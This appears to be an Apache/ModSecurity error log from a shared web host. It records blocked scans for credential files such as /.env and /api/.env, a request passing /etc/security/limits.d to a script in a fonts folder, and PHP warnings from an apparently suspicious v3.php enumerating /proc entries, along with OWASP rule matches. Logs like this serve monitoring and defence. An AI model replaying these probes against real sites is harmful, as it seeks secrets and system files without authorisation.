[Mon May 11 16:17:05.022296 2026] [security2:error] [pid 1411099:tid 1411123] [client 216.73.216.110:12842] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHk4A-Qm4vhlWBPlMi2OQAAABc"]
[Mon May 11 16:17:16.817345 2026] [security2:error] [pid 1411201:tid 1411259] [client 43.157.170.126:36752] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/"] [unique_id "agHk7Py_GXSWIKeli0vuxwAAAI0"]
[Mon May 11 16:17:21.013858 2026] [security2:error] [pid 1411201:tid 1411260] [client 43.157.170.126:45752] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/fr/"] [unique_id "agHk8fy_GXSWIKeli0vu4AAAAI4"], referer: http://www.homin.fr
[Mon May 11 16:17:21.703739 2026] [authz_core:error] [pid 1411099:tid 1411107] [client 216.73.216.110:37923] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/admin/lib/error_log
[Mon May 11 16:17:28.280171 2026] [proxy_fcgi:error] [pid 1411055:tid 1411063] [client 82.196.25.136:52374] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:17:54.054776 2026] [security2:error] [pid 1411099:tid 1411112] [client 43.159.57.144:58060] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.k06.fr"] [uri "/"] [unique_id "agHlEg-Qm4vhlWBPlMi2fQAAAAw"]
[Mon May 11 16:18:01.344817 2026] [authz_core:error] [pid 1411201:tid 1411259] [client 216.73.216.110:53589] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/src/Bridge/ZF2/error_log
[Mon May 11 16:18:25.630060 2026] [ssl:error] [pid 1411201:tid 1411264] (EAI 2)Name or service not known: [client 78.141.238.140:43940] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:25.630763 2026] [ssl:error] [pid 1411201:tid 1411264] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:28.382503 2026] [ssl:error] [pid 1411099:tid 1411121] (EAI 2)Name or service not known: [client 89.104.111.244:44717] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:28.382534 2026] [ssl:error] [pid 1411099:tid 1411121] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:36.310747 2026] [ssl:error] [pid 1411201:tid 1411256] (EAI 2)Name or service not known: [client 64.225.79.13:53200] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:36.310904 2026] [ssl:error] [pid 1411201:tid 1411256] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:36.871708 2026] [ssl:error] [pid 1411055:tid 1411064] (EAI 2)Name or service not known: [client 109.198.48.79:38579] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:36.871755 2026] [ssl:error] [pid 1411055:tid 1411064] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:39.405884 2026] [ssl:error] [pid 1411201:tid 1411269] (EAI 2)Name or service not known: [client 91.108.215.140:40063] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:39.405924 2026] [ssl:error] [pid 1411201:tid 1411269] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:45.371385 2026] [ssl:error] [pid 1411201:tid 1411266] (EAI 2)Name or service not known: [client 188.166.64.178:36320] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:45.371421 2026] [ssl:error] [pid 1411201:tid 1411266] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:47.795293 2026] [ssl:error] [pid 1411201:tid 1411259] (EAI 2)Name or service not known: [client 104.204.206.237:33421] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:47.795326 2026] [ssl:error] [pid 1411201:tid 1411259] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:48.272911 2026] [ssl:error] [pid 1411055:tid 1411071] (EAI 2)Name or service not known: [client 77.83.51.2:42789] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:48.272953 2026] [ssl:error] [pid 1411055:tid 1411071] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:50.797563 2026] [ssl:error] [pid 1411201:tid 1411424] (EAI 2)Name or service not known: [client 45.152.12.120:10802] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:50.797605 2026] [ssl:error] [pid 1411201:tid 1411424] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:56.668722 2026] [ssl:error] [pid 1411201:tid 1411424] (EAI 2)Name or service not known: [client 188.166.172.227:59490] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:56.668757 2026] [ssl:error] [pid 1411201:tid 1411424] AH01941: stapling_renew_response: responder error
[Mon May 11 16:18:59.361116 2026] [ssl:error] [pid 1411201:tid 1411268] (EAI 2)Name or service not known: [client 216.73.181.195:43083] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:18:59.361164 2026] [ssl:error] [pid 1411201:tid 1411268] AH01941: stapling_renew_response: responder error
[Mon May 11 16:19:02.370108 2026] [ssl:error] [pid 1411055:tid 1411064] (EAI 2)Name or service not known: [client 200.160.47.68:39741] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:19:02.370268 2026] [ssl:error] [pid 1411055:tid 1411064] AH01941: stapling_renew_response: responder error
[Mon May 11 16:19:03.321145 2026] [ssl:error] [pid 1412074:tid 1412095] (EAI 2)Name or service not known: [client 102.164.163.90:9073] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:19:03.321196 2026] [ssl:error] [pid 1412074:tid 1412095] AH01941: stapling_renew_response: responder error
[Mon May 11 16:19:04.958567 2026] [security2:error] [pid 1411201:tid 1411247] [client 208.84.102.199:13046] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/.env"] [unique_id "agHlWPy_GXSWIKeli0vv6gAAAIE"]
[Mon May 11 16:19:04.958801 2026] [security2:error] [pid 1411201:tid 1411247] [client 208.84.102.199:13046] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/.env"] [unique_id "agHlWPy_GXSWIKeli0vv6gAAAIE"]
[Mon May 11 16:19:04.959060 2026] [security2:error] [pid 1411201:tid 1411247] [client 208.84.102.199:13046] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/.env"] [unique_id "agHlWPy_GXSWIKeli0vv6gAAAIE"]
[Mon May 11 16:19:05.167920 2026] [security2:error] [pid 1411055:tid 1411079] [client 208.84.102.199:13130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/backend/.env"] [unique_id "agHlWUWKUxpmnkK7zHx4ZQAAARY"]
[Mon May 11 16:19:05.168150 2026] [security2:error] [pid 1411055:tid 1411079] [client 208.84.102.199:13130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/backend/.env"] [unique_id "agHlWUWKUxpmnkK7zHx4ZQAAARY"]
[Mon May 11 16:19:05.168599 2026] [security2:error] [pid 1411099:tid 1411101] [client 208.84.102.199:13100] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/.env.production"] [unique_id "agHlWQ-Qm4vhlWBPlMi28wAAAAA"]
[Mon May 11 16:19:05.168763 2026] [security2:error] [pid 1411099:tid 1411101] [client 208.84.102.199:13100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/.env.production"] [unique_id "agHlWQ-Qm4vhlWBPlMi28wAAAAA"]
[Mon May 11 16:19:05.168981 2026] [security2:error] [pid 1411099:tid 1411101] [client 208.84.102.199:13100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/.env.production"] [unique_id "agHlWQ-Qm4vhlWBPlMi28wAAAAA"]
[Mon May 11 16:19:05.169263 2026] [security2:error] [pid 1411055:tid 1411079] [client 208.84.102.199:13130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/backend/.env"] [unique_id "agHlWUWKUxpmnkK7zHx4ZQAAARY"]
[Mon May 11 16:19:05.171119 2026] [security2:error] [pid 1416109:tid 1416142] [client 208.84.102.199:13112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/app/.env"] [unique_id "agHlWVV4kyjgo4bQBUhQowAAAMw"]
[Mon May 11 16:19:05.171311 2026] [security2:error] [pid 1416109:tid 1416142] [client 208.84.102.199:13112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/app/.env"] [unique_id "agHlWVV4kyjgo4bQBUhQowAAAMw"]
[Mon May 11 16:19:05.171558 2026] [security2:error] [pid 1416109:tid 1416142] [client 208.84.102.199:13112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/app/.env"] [unique_id "agHlWVV4kyjgo4bQBUhQowAAAMw"]
[Mon May 11 16:19:05.211096 2026] [security2:error] [pid 1411201:tid 1411247] [client 208.84.102.199:13046] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/.env.local"] [unique_id "agHlWfy_GXSWIKeli0vv7AAAAIE"]
[Mon May 11 16:19:05.211353 2026] [security2:error] [pid 1411201:tid 1411247] [client 208.84.102.199:13046] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/.env.local"] [unique_id "agHlWfy_GXSWIKeli0vv7AAAAIE"]
[Mon May 11 16:19:05.211593 2026] [security2:error] [pid 1411201:tid 1411247] [client 208.84.102.199:13046] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/.env.local"] [unique_id "agHlWfy_GXSWIKeli0vv7AAAAIE"]
[Mon May 11 16:19:05.234680 2026] [security2:error] [pid 1412074:tid 1412089] [client 208.84.102.199:13122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/api/.env"] [unique_id "agHlWTJnyuKVXoStDhaxmAAAAE0"]
[Mon May 11 16:19:05.234858 2026] [security2:error] [pid 1412074:tid 1412089] [client 208.84.102.199:13122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/api/.env"] [unique_id "agHlWTJnyuKVXoStDhaxmAAAAE0"]
[Mon May 11 16:19:05.236474 2026] [security2:error] [pid 1412074:tid 1412089] [client 208.84.102.199:13122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/api/.env"] [unique_id "agHlWTJnyuKVXoStDhaxmAAAAE0"]
[Mon May 11 16:19:17.181129 2026] [security2:error] [pid 1411055:tid 1411060] [client 43.165.4.2:51544] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.domaine-de-janasse.com"] [uri "/"] [unique_id "agHlZUWKUxpmnkK7zHx4cwAAAQM"]
[Mon May 11 16:20:10.044597 2026] [authz_core:error] [pid 1412074:tid 1412097] [client 17.241.219.250:33818] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sodium_compat/namespaced/error_log
[Mon May 11 16:20:12.417201 2026] [security2:error] [pid 1411099:tid 1411116] [client 43.153.208.32:33762] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.nearoo.fr"] [uri "/"] [unique_id "agHlnA-Qm4vhlWBPlMi3UgAAABA"]
[Mon May 11 16:20:23.207824 2026] [security2:error] [pid 1416109:tid 1416141] [client 43.133.69.37:57136] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHlp1V4kyjgo4bQBUhRFQAAAMs"]
[Mon May 11 16:21:53.774697 2026] [core:error] [pid 1411099:tid 1411292] [client 198.235.24.174:64784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.crm2.rentparadise.fr/
[Mon May 11 16:21:53.775074 2026] [core:error] [pid 1411099:tid 1411292] [client 198.235.24.174:64784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.crm2.rentparadise.fr/
[Mon May 11 16:22:20.928215 2026] [security2:error] [pid 1416109:tid 1416139] [client 216.73.216.110:29766] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/limits found within ARGS:path: /etc/security/limits.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHmHFV4kyjgo4bQBUhSYwAAAMk"]
[Mon May 11 16:22:20.929051 2026] [security2:error] [pid 1416109:tid 1416139] [client 216.73.216.110:29766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHmHFV4kyjgo4bQBUhSYwAAAMk"]
[Mon May 11 16:22:20.986252 2026] [security2:error] [pid 1416109:tid 1416139] [client 216.73.216.110:29766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHmHFV4kyjgo4bQBUhSYwAAAMk"]
[Mon May 11 16:22:52.150258 2026] [ssl:error] [pid 1411099:tid 1411116] (EAI 2)Name or service not known: [client 198.235.24.172:62896] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 16:22:52.150562 2026] [ssl:error] [pid 1411099:tid 1411116] AH01941: stapling_renew_response: responder error
[Mon May 11 16:23:17.593694 2026] [security2:error] [pid 1411201:tid 1411424] [client 193.58.104.14:46697] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHmVfy_GXSWIKeli0vxLgAAAJM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 16:23:18.529635 2026] [authz_core:error] [pid 1416109:tid 1416134] [client 216.73.216.110:6682] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/survey/error_log
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705331/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705331/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705331/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705331/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705331/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705331/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
